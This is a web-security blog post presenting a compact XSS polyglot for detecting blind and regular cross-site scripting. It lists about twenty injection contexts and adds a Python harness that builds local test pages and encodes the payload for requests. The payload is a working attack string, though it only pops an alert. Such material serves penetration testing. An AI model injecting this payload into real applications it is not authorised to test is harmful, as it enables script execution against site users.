Blind XSS Detection
I noticed that Gareth Heyes has a sweet one-liner XSS testing polyglot in his Twitter profile (@GarethHeyes).
This vector is particularly useful for detecting blind XSS vulnerabilities.
I thought it would be fun to see if I could make it shorter and more effective.
I managed to shorten it by 10 bytes and, surprisingly enough, it also works in one more context. This is the one-liner polyglot:
javascript:/*</title></textarea></style --></xmp></script><svg/onload='//"/**/%0aonmouseover=alert()//'>
It is 103 bytes long and works in one more context than Gareth's (his doesn't work in single-line comment contexts, i.e. after //), although I find his vector to be more elegant.
I decided to improve it so that it works in every possible context:
<script>xss</script>
<script>a='xss'</script>
<script>a="xss"</script>
<script>//xss</script>
<script>/*xss*/</script>
<a href='xss'></a>
<title>xss</title>
<textarea>xss</textarea>
<style>xss</style>
<div>xss</div>
<div xss></div>
<div class='xss'></div>
<div class="xss"></div>
<div class=xss></div>
<noscript>xss</noscript>
<noembed>xss</noembed>
<!-- xss -->
<xmp>xss</xmp>
<math>xss</math>
<frameset>xss</frameset>
The resulting vector is:
javascript:/*</title></textarea></style --></xmp></script></noembed></noscript></math><svg/onload='//"/**/%0aonmouseover=alert()//'>
Besides blind XSS, this vector is also good for speeding up the search for regular cross-site scripting vulnerabilities. Instead of sending 21 requests per parameter (one for each context above) when testing an application, you only have to make one request, which gets the job done in roughly 1/21, or about 5%, of the time.
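As an added example (not code from the original post), here is a small Python harness that writes one local test page per context listed above, so the vector can be checked in a browser by loading each page and hovering over it, and that handles the one wire-level detail the vector depends on: the `%0a` has to be URL-decoded by the target into a real newline, otherwise the `//` comment in front of `onmouseover=alert()` swallows it and nothing fires. If a tool percent-encodes the payload a second time, the page receives the literal text `%0a` and the vector is dead; `encode_for_query` below avoids that by decoding first and encoding exactly once. The context names, file layout and helper names are my own choices. For a truly blind test you would swap `alert()` for a callback to a server you control and re-check the result against every context; that is not done here.

```python
"""Harness for checking the post's XSS polyglot across injection contexts.

Added example, not code from the original post. It builds one local HTML
page per context so the polyglot can be verified in a browser, and shows
how to put the payload on the wire so that its %0a reaches the page as a
real newline.
"""
import urllib.parse
from pathlib import Path

# Final vector from the post. The %0a is expected to be URL-decoded by the
# target so that a real newline ends the `//` line comment; without that
# newline, `onmouseover=alert()` stays inside the comment and nothing fires.
POLYGLOT = (
    "javascript:/*</title></textarea></style --></xmp></script>"
    "</noembed></noscript></math>"
    "<svg/onload='//\"/**/%0aonmouseover=alert()//'>"
)

# The injection contexts listed in the post; "xss" marks the injection point.
# The names are my own labels, not from the post.
CONTEXTS = {
    "script-body": "<script>xss</script>",
    "script-single-quote": "<script>a='xss'</script>",
    "script-double-quote": '<script>a="xss"</script>',
    "script-line-comment": "<script>//xss</script>",
    "script-block-comment": "<script>/*xss*/</script>",
    "href": "<a href='xss'>link</a>",
    "title": "<title>xss</title>",
    "textarea": "<textarea>xss</textarea>",
    "style": "<style>xss</style>",
    "text": "<div>xss</div>",
    "attr-name": "<div xss></div>",
    "attr-single-quote": "<div class='xss'></div>",
    "attr-double-quote": '<div class="xss"></div>',
    "attr-unquoted": "<div class=xss></div>",
    "noscript": "<noscript>xss</noscript>",
    "noembed": "<noembed>xss</noembed>",
    "comment": "<!-- xss -->",
    "xmp": "<xmp>xss</xmp>",
    "math": "<math>xss</math>",
    "frameset": "<frameset>xss</frameset>",
}


def as_seen_by_page(payload: str = POLYGLOT) -> str:
    """The text the HTML parser sees after the server URL-decodes the parameter.

    The only percent sequence in the vector is %0a, which becomes "\\n".
    """
    return urllib.parse.unquote(payload)


def encode_for_query(payload: str = POLYGLOT) -> str:
    """Percent-encode the payload exactly once for a GET/POST parameter.

    Decoding first and then encoding avoids double-encoding: if the literal
    '%' of %0a were encoded to %25, the page would receive the text "%0a"
    instead of a newline. The newline comes back out as %0A.
    """
    return urllib.parse.quote(as_seen_by_page(payload), safe="")


def render(context: str, payload: str = POLYGLOT) -> str:
    """Inject the decoded payload into a context template at the 'xss' marker."""
    return context.replace("xss", as_seen_by_page(payload), 1)


def write_test_pages(out_dir: str, payload: str = POLYGLOT) -> list:
    """Write one minimal HTML page per context and return the paths written.

    Open each file in a browser and move the mouse over the page: contexts
    where the vector works pop an alert on load (svg onload) or on hover
    (the injected onmouseover attribute).
    """
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    written = []
    for name, template in CONTEXTS.items():
        page = f"<!doctype html>\n<!-- context: {name} -->\n{render(template, payload)}\n"
        path = out / f"{name}.html"
        path.write_text(page, encoding="utf-8")
        written.append(path)
    return written


if __name__ == "__main__":
    print("wire form:", encode_for_query())
    for p in write_test_pages("xss-contexts"):
        print("wrote", p)
```

Running the module writes the pages into an `xss-contexts` directory (an assumed name) and prints the single-encoded form to paste into a request. The decoded newline is visible in the rendered output: in the `href` context, for example, the `'` after `onload=` closes the `href` attribute and `onmouseover=alert()` lands on its own line as an attribute of the `<a>` element.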
Can you make it even shorter? Let me know in the comments or through twitter (@ruben_v_pina)
Filed under: Hacking,Web Application Security,XSS - @ 2023-07-12 23:12
Tags: cross, cross-site scripting, detection, gareth, gareth heyes, heyes, liner, one, one-liner, optimization, polyglot, scripting, site, xss